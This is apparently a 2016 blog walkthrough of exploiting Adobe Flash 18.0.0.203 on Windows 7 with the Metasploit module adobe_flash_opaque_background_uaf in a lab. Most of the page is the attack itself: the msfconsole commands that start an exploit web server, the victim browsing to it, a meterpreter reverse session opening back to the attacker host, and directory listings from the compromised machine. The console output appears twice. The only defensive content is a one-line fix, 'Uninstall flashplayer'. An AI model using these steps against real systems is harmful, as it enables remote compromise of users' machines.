Metasploit Adobe Flash 18.0.0.203 Exploit – Windows 7 / Windows 8.1
July 01, 2016 —
metalkey
Attacker: Kali LinuxVictim: Windows 7 Enterprise 32-bit (Adobe Flashplayer 18.0.0.203, Firefox 39)
Step 1 – Starting the Exploit Server
Run msfconsole, load adobe-flash-opaque-background-uaf and set all required options.
root@kali:~$ msfconsole
msf >use exploit/multi/browser/adobe_flash_opaque_background_uaf
msf exploit(adobe_flash_opaque_background_uaf) >set SRVPORT 80
msf exploit(adobe_flash_opaque_background_uaf) >set URIPATH /
msf exploit(adobe_flash_opaque_background_uaf) >exploit
[*] Local IP: http://192.168.1.12:80/
[*] Server started.
msf >
msf exploit(adobe_flash_opaque_background_uaf) >
msf exploit(adobe_flash_opaque_background_uaf) >
msf exploit(adobe_flash_opaque_background_uaf) >
[*] Local IP: http://192.168.1.12:80/
[*] Server started.
Step 2 – Exploiting the Victim Machine
On your Windows test machine (victim), start Firefox and browse to http://192.168.1.12.
This will trigger the adobe-flash-opaque-background-uaf exploit and launch a meterpreter session.
[*] 192.168.1.11 adobe_flash_opaque_background_uaf - Sending SWF...
[*] Sending stage (885806 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.11:49297) at 2015-08-01 04:39:34 -0400
msf exploit(adobe_flash_opaque_background_uaf) >sessions -i 1
[*] Starting interaction with 1...
meterpreter >getuid
Server username: IE8Win7\IEUser
meterpreter >ls
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2013-10-23 12:22:56 -0400 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2009-07-14 00:53:55 -0400 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-13 22:37:05 -0400 PerfLogs
40555/r-xr-xr-x 0 dir 2015-08-01 03:32:42 -0400 Program Files
40777/rwxrwxrwx 0 dir 2015-08-01 03:32:42 -0400 ProgramData
40777/rwxrwxrwx 0 dir 2013-10-23 12:22:42 -0400 Recovery
40777/rwxrwxrwx 0 dir 2014-11-26 14:57:05 -0500 System Volume Information
40555/r-xr-xr-x 0 dir 2013-10-23 12:22:47 -0400 Users
40777/rwxrwxrwx 0 dir 2013-10-23 17:52:20 -0400 Wallpaper
40777/rwxrwxrwx 0 dir 2015-08-01 03:20:08 -0400 Windows
100777/rwxrwxrwx 24 fil 2009-06-10 17:42:20 -0400 autoexec.bat
100666/rw-rw-rw- 10 fil 2009-06-10 17:42:20 -0400 config.sys
100666/rw-rw-rw- 1073741824 fil 2015-08-01 04:01:24 -0400 pagefile.sys
[*] Sending stage (885806 bytes) to 192.168.1.11
[*] Meterpreter session 1 opened (192.168.1.12:4444 -> 192.168.1.11:49297) at 2015-08-01 04:39:34 -0400
msf exploit(adobe_flash_opaque_background_uaf) >
[*] Starting interaction with 1...
meterpreter >
Server username: IE8Win7\IEUser
meterpreter >
Listing: C:\
============
Mode Size Type Last modified Name
---- ---- ---- ------------- ----
40777/rwxrwxrwx 0 dir 2013-10-23 12:22:56 -0400 $Recycle.Bin
40777/rwxrwxrwx 0 dir 2009-07-14 00:53:55 -0400 Documents and Settings
40777/rwxrwxrwx 0 dir 2009-07-13 22:37:05 -0400 PerfLogs
40555/r-xr-xr-x 0 dir 2015-08-01 03:32:42 -0400 Program Files
40777/rwxrwxrwx 0 dir 2015-08-01 03:32:42 -0400 ProgramData
40777/rwxrwxrwx 0 dir 2013-10-23 12:22:42 -0400 Recovery
40777/rwxrwxrwx 0 dir 2014-11-26 14:57:05 -0500 System Volume Information
40555/r-xr-xr-x 0 dir 2013-10-23 12:22:47 -0400 Users
40777/rwxrwxrwx 0 dir 2013-10-23 17:52:20 -0400 Wallpaper
40777/rwxrwxrwx 0 dir 2015-08-01 03:20:08 -0400 Windows
100777/rwxrwxrwx 24 fil 2009-06-10 17:42:20 -0400 autoexec.bat
100666/rw-rw-rw- 10 fil 2009-06-10 17:42:20 -0400 config.sys
100666/rw-rw-rw- 1073741824 fil 2015-08-01 04:01:24 -0400 pagefile.sys
Solution
Uninstall flashplayer.
Tags: metasploit